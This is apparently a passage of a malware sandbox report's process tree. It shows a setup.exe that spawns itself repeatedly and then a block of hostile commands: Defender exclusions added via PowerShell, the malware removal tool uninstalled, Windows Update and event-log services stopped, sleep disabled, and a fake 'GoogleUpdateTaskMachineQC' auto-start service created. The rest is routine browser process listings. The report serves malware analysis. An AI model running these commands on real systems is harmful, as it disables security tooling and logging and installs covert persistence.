        Power Settings
        
        PID:1636
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        58⤵
        Power Settings
        
        PID:3080
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        58⤵
        Launches sc.exe
        
        PID:7868
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
        58⤵
        Launches sc.exe
        
        PID:4924
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        56⤵
        
        PID:1496
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        55⤵
        
        PID:512
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        54⤵
        
        PID:6836
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        53⤵
        
        PID:5444
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        52⤵
        
        PID:2364
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        51⤵
        
        PID:4608
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        50⤵
        
        PID:5864
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        49⤵
        
        PID:6496
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        48⤵
        
        PID:5108
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        47⤵
        
        PID:4716
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        46⤵
        
        PID:1856
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        45⤵
        
        PID:2700
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        44⤵
        
        PID:7844
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        43⤵
        
        PID:3004
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        42⤵
        
        PID:2476
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        41⤵
        
        PID:4880
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        40⤵
        
        PID:3868
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        39⤵
        
        PID:9072
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        38⤵
        
        PID:8516
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        37⤵
        
        PID:2784
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        36⤵
        
        PID:7936
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        35⤵
        
        PID:7932
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        34⤵
        
        PID:7700
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        33⤵
        
        PID:7276
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        32⤵
        
        PID:8000
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        31⤵
        
        PID:7700
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        30⤵
        
        PID:7412
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        29⤵
        
        PID:6360
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        28⤵
        
        PID:5948
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        27⤵
        
        PID:6752
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        26⤵
        
        PID:6264
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        25⤵
        
        PID:6864
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        24⤵
        
        PID:6268
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        23⤵
        
        PID:7060
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        22⤵
        
        PID:6852
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        21⤵
        
        PID:6464
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        20⤵
        
        PID:5172
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        19⤵
        
        PID:5016
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        18⤵
        
        PID:6000
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        17⤵
        
        PID:3128
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        16⤵
        
        PID:5608
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        15⤵
        
        PID:5408
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        14⤵
        
        PID:5188
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        13⤵
        
        PID:4640
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        12⤵
        
        PID:4376
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        11⤵
        
        PID:3536
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        10⤵
        
        PID:4608
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        9⤵
        
        PID:676
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        8⤵
        
        PID:712
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        7⤵
        
        PID:2592
      - C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        6⤵
        Executes dropped EXE
        
        PID:4168
    - - C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        5⤵
        Executes dropped EXE
        
        PID:4764
  - - C:\Users\Admin\AppData\Local\Temp\setup.exe
      "C:\Users\Admin\AppData\Local\Temp\setup.exe"
      4⤵
      Executes dropped EXE
      PID:2364
- - C:\Users\Admin\AppData\Local\Temp\setup.exe
    "C:\Users\Admin\AppData\Local\Temp\setup.exe"
    3⤵
    - Executes dropped EXE
    PID:60
- C:\Users\Admin\AppData\Local\Temp\setup.exe
  "C:\Users\Admin\AppData\Local\Temp\setup.exe"
  2⤵
  - Executes dropped EXE
  PID:2296
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:5332
  - - C:\Windows\system32\wusa.exe
      wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:3524
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:5988
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:4584
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop wuauserv
    3⤵
    - Launches sc.exe
    PID:8596
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop bits
    3⤵
    - Launches sc.exe
    PID:5840
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop dosvc
    3⤵
    - Launches sc.exe
    PID:6856
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    PID:9096
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    PID:2252
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    PID:6104
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    PID:6248
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
    3⤵
    - Launches sc.exe
    PID:872
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:5724
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:6696
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
    3⤵
    - Launches sc.exe
    PID:7936

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
PID:1272
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xd4,0x10c,0x7fff6debcc40,0x7fff6debcc4c,0x7fff6debcc58
  2⤵
  PID:1988
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1908,i,17616897195303766311,13651541709567430684,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=1904 /prefetch:2
  2⤵
  PID:4992
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2036,i,17616897195303766311,13651541709567430684,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2488 /prefetch:3
  2⤵
  PID:3284
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2124,i,17616897195303766311,13651541709567430684,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2660 /prefetch:8
  2⤵
  PID:2596
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3068,i,17616897195303766311,13651541709567430684,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3084 /prefetch:1
  2⤵
  PID:5552
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3116,i,17616897195303766311,13651541709567430684,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3144 /prefetch:1
  2⤵
  PID:5564
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4544,i,17616897195303766311,13651541709567430684,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4596 /prefetch:1
  2⤵
  PID:5952
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4864,i,17616897195303766311,13651541709567430684,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4496 /prefetch:1
  2⤵
  PID:6224
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4492,i,17616897195303766311,13651541709567430684,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4920 /prefetch:8
  2⤵
  PID:6884
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4952,i,17616897195303766311,13651541709567430684,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4972 /prefetch:8
  2⤵
  PID:7096
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=5380,i,17616897195303766311,13651541709567430684,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5372 /prefetch:1
  2⤵
  PID:7320
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3996,i,17616897195303766311,13651541709567430684,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4000 /prefetch:8
  2⤵
  PID:1728

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
PID:4460
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff6debcc40,0x7fff6debcc4c,0x7fff6debcc58
  2⤵
  PID:3112

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:5764

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
PID:7904
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7fff607c46f8,0x7fff607c4708,0x7fff607c4718
  2⤵
  PID:7836
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2188,4267871332396150589,12410476426571079431,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2200 /prefetch:2
  2⤵
  PID:6876
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2188,4267871332396150589,12410476426571079431,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2252 /prefetch:3
  2⤵
  PID:4128
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2188,4267871332396150589,12410476426571079431,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2464 /prefetch:8
  2⤵
  PID:8000
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,4267871332396150589,12410476426571079431,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3000 /prefetch:1
  2⤵
  PID:6952
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2188,4267871332396150589,12410476426571079431,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3008 /prefetch:1
  2⤵
  PID:528

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:1448

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
PID:3264
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff607c46f8,0x7fff607c4708,0x7fff607c4718
  2⤵
  PID:3640
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,8600908008847785993,15533945071916562195,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2
  2⤵
  PID:8752
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,8600908008847785993,15533945071916562195,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:3
  2⤵
  PID:8760

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:8460

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:8996

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:9144

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
PID:5108
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff607c46f8,0x7fff607c4708,0x7fff607c4718
  2⤵
  PID:9048
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1976,7468267694907106118,13739905465802379447,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2060 /prefetch:2
  2⤵
  PID:5916
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1976,7468267694907106118,13739905465802379447,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2112 /prefetch:3
  2⤵
  PID:2528
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1976,7468267694907106118,13739905465802379447,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2928 /prefetch:8
  2⤵
  PID:7224
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1976,7468267694907106118,13739905465802379447,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:1
  2⤵
  PID:5224
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1976,7468267694907106118,13739905465802379447,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:1
  2⤵
  PID:6016
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1976,7468267694907106118,13739905465802379447,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5008 /prefetch:1
  2⤵
  PID:8336
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1976,7468267694907106118,13739905465802379447,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5040 /prefetch:1
  2⤵
  PID:8324
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1976,7468267694907106118,13739905465802379447,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3452 /prefetch:1
  2⤵
  PID:7148
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
